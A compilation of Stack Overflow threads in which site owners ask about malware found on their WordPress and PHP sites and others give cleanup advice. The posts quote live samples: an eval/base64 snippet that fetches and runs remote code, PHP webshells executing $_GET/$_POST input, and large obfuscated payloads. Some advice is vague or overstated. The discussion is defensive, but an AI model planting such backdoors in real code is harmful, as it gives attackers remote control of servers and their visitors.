This question already has answers here:
How to get rid of eval-base64_decode like PHP virus files?
(8 answers)
Closed 6 years ago.
I'm using a wordpress blog today i got a comment like this .
<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->
When i've decoded this comment using decoder i got
$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);
I'm getting many comments like this . Can anyone help me to resolve this problem .? Is it a Hack or does it shows the beginning of hacking ?
It is a hack or at least an attempt. They are taking advantage of an unresolved wordpress vulnerability that can allow them to download and executing code among other things. This type of attack has very little public exposure at the moment on the web and can be particularly nasty if it is originating from an educated source. If you notice these type of code snippets around your server side then please do more research to determine if you are truly infected and if so, to what level the infection has actually gone. I have seen entire shared hosting servers infected from individual wordpress site admins either allowing via ignorance or actively helping this problem propagate. Unfortunately this particular problem is currently not very well documented on the web so you will likely have to do a good bit of research to be sure your site is OK. To help you research I'll clarify the terminology of this hack.
This is a PHP Code Injection attack that is most likely attempting to exploit a known vulnerability in the wordpress framework. It is using Base64 encoded PHP code to inject itself onto your hosting server via eval() which is a programming language construct that is present in nearly all programming languages, including PHP. Hacker's with extremely organized and advanced abilities have made use of this exploit recently to wreak absolute havoc on compromised wordpress sites so be extremely careful when handling this type of problem.
None of the suggestions worked for us. The following is how we removed malicious code from multiple wordpress sites without any downtime.
We ran into a problem where we had multiple legacy wordpress sites sharing one filesystem that was infiltrated by this virus.
We ended up writing a little python script to traverse our filesystem and detect the malicious code.
Here's the code for anyone interested (NOTE: USE AT OWN RISK):
https://github.com/michigan-com/eval_scrubber
pip install eval_scrubber
// finds all infected files, will not do anything but READ
python -m eval_scrubber find .
// attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .
That scripts will scan the filesystem for malicious content and as a separate command it will attempt to remove the base64 eval functions.
This is really a temporary solution because the generator of this virus uses PHP comments to cause the regex to not match. We ended up using auditd to monitor what file is writing to a file we knew was getting infected: http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html
Once we found the generator of the virus, did one more eval_scrubber remove and then our problem was fixed.
I was searching for a good and fast solution. This will help you find which files are infected with eval64. Then you can use search/replace in Dreamweaver and remove it from all files at once.
Threat scan plugin
BUT
There was an index file with short 2 lines of code. That 2 lines were injecting eval over and over. I forgot which index.php it was but look in folders:
wp-admin
wp-content
wp-include
Try to search for md5 in your files using Dreamweaver.
Hope you'll be able to fix it.
Related
This question already has answers here:
wordpress hacked: what does this script actually do?
(2 answers)
Closed 4 years ago.
I have several web sites on a shared server, and have noticed a load of .php files appear in various folders, none of which were put there by me.
I am a .NET developer, so apart from one site which uses WordPress, none of my sites use PHP. Therefore, I can only assume that the server has been accessed, and suspicious files uploaded.
However, with my basic knowledge of PHP, I can't tell what these files are doing. I am hoping some PHP expert can help me.
Here is a sample...
<?php if(key($_GET)=='35')call_user_func($_GET['35'],$_REQUEST['c'],$_REQUEST['d']);
...and another...
<?php
$acnhe="s\x74\x72\x5fr\x65\x70\x6ca\x63e";$admno=$acnhe('f','',"b\x66afsfef6f4f_\x66dfefcfofd\x66e");$acnhe=$admno($acnhe('|','',$_POST['1043f']));$adnmo="\x61ss\145".'rt';#$adnmo($acnhe);#eval($acnhe);
$k=substr("class",2)."ert"; # $k(${"_PO"."ST"} ['335']);
Anyone able to explain what these would do if/when called?
Your wordpress site has been compromised. It's quite common that unpatched security vulnerabilities in WP allow users to inject these kinds of files which end up causing all sorts of trouble to your visitors (by redirecting them to malicious sites, for example).
You can safely delete this file, and you should do it ASAP.
Also, it's time to secure your WP installation (update the core to the latest version) and go through all of WP's core php files and look for similar strings within them (these malicious exploits sometimes allow core WP files to get injected too) and clean them up.
I have a hosting with one main application written in Laravel 4, and several sub-domain sites mostly made with Wordpress.
Last few days I have a big problem since every PHP file on my hosting, regardless of it's location gets altered by adding some code at the beginning.
Has anyone had this kind of problem? I guess it comes from Wordpress being hacked, but is there a way to localize it to that specific wordpress?
It's somewhat rare for WordPress itself to be 'hacked'. More likely is a poorly written or compromised plugin or theme has been used.
Themes can also use scripts which can have very dangerous security flaws in them. One such example is TimThumb, which was part of many legitimate themes, but contained a security hole which allows an attacker to write to any files owned by the same user on the server. More here: http://blog.vaultpress.com/2011/08/02/vulnerability-found-in-timthumb/
My advice:
Update WordPress
Update all plugins
Remove any unneccessary plugins and only use ones from larger vendors (JetPack can often replace many other plugins but you know it will be safe and secure as it's built by Automattic, the creators of WordPress)
Change your FTP password
Change your admin password
I have faced these similar situation before..There are many plguins to protect the website from code injection techniques..
here is a plugins for wp to stay safe from many of the atttacks
https://wordpress.org/plugins/bulletproof-security/
You can read more about how to prevent code injection from ur website here.
PS: Sorry if i misunderstood ur question..
This question already has answers here:
PHP source code security on server
(8 answers)
Closed 9 years ago.
If I have a php code on my website is there any way for a user to view it? I ask because I'm using the Pear mail package (I might change before I upload my website), and it requires my email and password be in the code for it to use. Is this a potential security risk, or is there no way for the user to see this code anyways?
While we are at it, is there a good guide for hackers on how to exploit security risks(specifically SQL injections and similar methods)? It would be useful when checking my site's security, if I had a full list of all the common things that hackers try, and explanations for how to do them.
Keeping a password in a PHP program file is extremely common practice.
As long as you've named all your files with a .php extension, and your server is configured to process .php files as PHP code, then you shouldn't have any problems.
Don't use a .inc extension or anything like that, because yes, that might expose your code.
Also, it's generally a good idea to place as much of your PHP code as possible outside of the web-accessible areas. Only your base PHP file that is actually loaded on startup should be web accessible. All your includes and libraries should be safely stashed away somewhere else where they can be included, but can't be read directly.
This function will cover it:
highlight_string
I'm having many websites installed on the same webserver. What i wanna do, is to be able to include a same file from different websites as
<?php include '/home/site/www/path/to/file.php'; ?>
and in the same time block functions like highlight_file and file so using the following code won't displays my files content
<?php echo hightlight_file('/home/site/www/path/to/file.php'); ?>
Any help will be appreciated.
If you want your PHP files to be runnable but be safe from being read, your best option is to encode them.
Take a look at IonCube PHP Encoder and SendGuard , they are both very popular options to protect source code.
Blocking PHP function can work, but you'll never be safe because you can forget functions (can you reall list them all? What if there's one you actually need?), or new functions could be added in the future and if you do not block them you'd be exposed.
...so using the following code won't displays my files content
Does that mean you want to allow other people to deploy code on the server which calls your code without revealing the PHP source? If so, then disabling highlight_file isn't going to help much. You also need to disable include, require, fopen, file_get_contents, the imap extension and several other things - which means they won't be able to access your code at all.
If you're letting other people whom you don't necessarily trust deploy code on your server then there are lots of things you need to do to isolate each account - it's not a trivial exercise and well beyond the scope of an answer here. But it's not really possible to allow access to a shared include file without providing access to the source code. Using encoded PHP solves some problems but introduces others. A better solution is to expose the functionality via a web or socket API (this solves the sharing problem but not the isolation problem).
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 9 years ago.
Improve this question
We've been having some troubles with cracked sites lately.
We've found several files on our sites (who are on a shared hosting platform) that don't belong there. These files are usually .txt or image files (it was a .js file once) that then get included in existing php files, effectively running them on the server.
The php code is something like this:
<?php eval(gzuncompress(base64_decode('eF6VWNtu40YM/ZU...
Well it really just goes on from there.
From what I understand so far, the above code opens some kind of shell.
We also have sites that are infected who have links to various porn/advertising sites added to the bottom of the page. Although I don't think it's the same code (as the snippet above) that adds these links to the page. I have yet to find the source of these alterations.
Most of these attacks occur on Drupal sites, some of them are upgraded to the latest version of everything (modules + core) and still show signs of attacks.
The attacks aren't limited to Drupal sites however, there are normal php sites that where cracked as well.
I know the first step would be to check the server logs, I've requested them but I do not have them yet.
I was wondering if anyone could give me some pointers as to what I should look for or what the next "obvious" steps to take are. (I've already changed the db and ftp passwords).
I have used the following snippet to track down some of the files:
grep -nRH --exclude=*.js 'eval(' *
I also ran that piece of code without excluding javascript files and I've deleted all of the attacker's files I could find.
I'd be happy to provide any additional information that could help solve this issue.
EDIT: the source code of the files:
<?php eval(gzuncompress(base64_decode('eF6VWNtu40YM/ZU+LOBdoChsaV1AKPJgP6wMYZvCLqpbsQgsyYmbyK4QX+Wv7/BQF3dDjjcvI0XkcMhD8gydD/7XP6aTr3/+PXg4PAy+3U1eX5f1x2y5W/36+aFY5f8Wq4+DwU+/DNI4qDM3eMw34ck8h8uIvo63g08/f6edbkkSHhKXnosqc8b08pjG6yp3F5e3O0hsJPSoMz88yBrplmxCq8podcZkE3/ntIq2041HslMafb7TfJ2OitnvknRzvyN55t6X0l7jD5/b+ANEOE58R/y0SH7R942n+UXSbUBriTOiuehfuePc3FerzV9KBMZ72HkrXdL3eFIjRt87wNaJ1jvBVpMlaJsqcHR7xha9NfYkW4mpJpImcUmPx3wWXuhlObnD8dIOEgS12fHInoR7Id5o/CKfRvuQFXPScqLFeH1K7tO7dxLtkahGZkjTWVfpdq557qxrGc0MFRIIHstxLKPRyWD7Alznkv/FLKiyuYZhPgvKdOTVaTzdcVXRItU2IwVtRIodkVZH9t41VUrSHWo6BKaws/LLi9x3JC6AfrlHrLSI8XYdEI3oYVhppPjYsAexkelQUlpXXEcSayRuyBHR+sWrsk05tGh98S6dn7C9ODKCak0g82FjH5hceLfZOZN6nZkmxFlpDLw1zd4rel6uvULEM8CpetbHxDjxWbxT20Wfk967o67Z2qelQddUQvgsarb4P0PbN7b12r55f5g+3GeOiBiYm6RARuM+7gdUZBIvnnWuYoSNNj3+twMbNPu0GH7NmT2Fqsz5RgF2he/tgI5blPmTZDPv+3ff+GuNjN5uaV/xQhsVPRTtgnlyl1J+KYPAdyF0Z+MFPWCbmVX1gj04A4cIPg9lPqT7KmaWLZnPz+vEkW5KsklynG5OpvcmX1qW3WndTEHDVMzAEnchcD3I9yDnPPznOv+xc38s6D0aC5wDTedcpvFEiRd21BpCTTrowSFiNF3FXBuMk2jxotSSvS6v7hVURaTeKcjFlJYa0wLj13mj4IhqwFxhmSk4HyYXpPKEpIk5IcmPzChtbn4sLy079B0BD3ix9jtXiMRaOaSipPXJNXWNfFNd04tU2/Q9A9Lz0VtpFklfESlPQ3zDmh7mKVfr36LRNrPLcyZqdXwQIeOaFk4OwBpGg/6SbdlPskn5fHNTBVUCXM7K/NznSP1V4pyPyZM6tap3jvFhZ6r1Vbaq7wPSXIWW/blrZitfmpDflSVmbTXrJgbCkOQGR9AxZioZS3h+hTziRCS2DLzx5obP9OiqS60dxgD5YxwsVXZbC31KMh+8qlSKpZvRueEwcbzj0iklP3xcTnvL/EPfmxlIZ2pzAklG2VatrbY+mJWAJHCnRb2/DYfArowNMxQtnuCTzD8NYogns+Pazw3t7xQpR+1M1vyiQVa730Hyjm4iqO2adrZhVIOO9YCmqNlwtIok0Ldk97tqfbenehY5G9354mza9YCSJ0j1XNPS1i/saFHK9dJMKLL+bUSV/0rpPnf/CYGvtLwflfb8rO81eQoAKrjrfbAs/unV3Pe0qJMvV3A/IdyYfG394xh+IjXiKDwlniIBbie/vOKqT7/9BzrVvS4='))); ?><?php eval(gzuncompress(base64_decode('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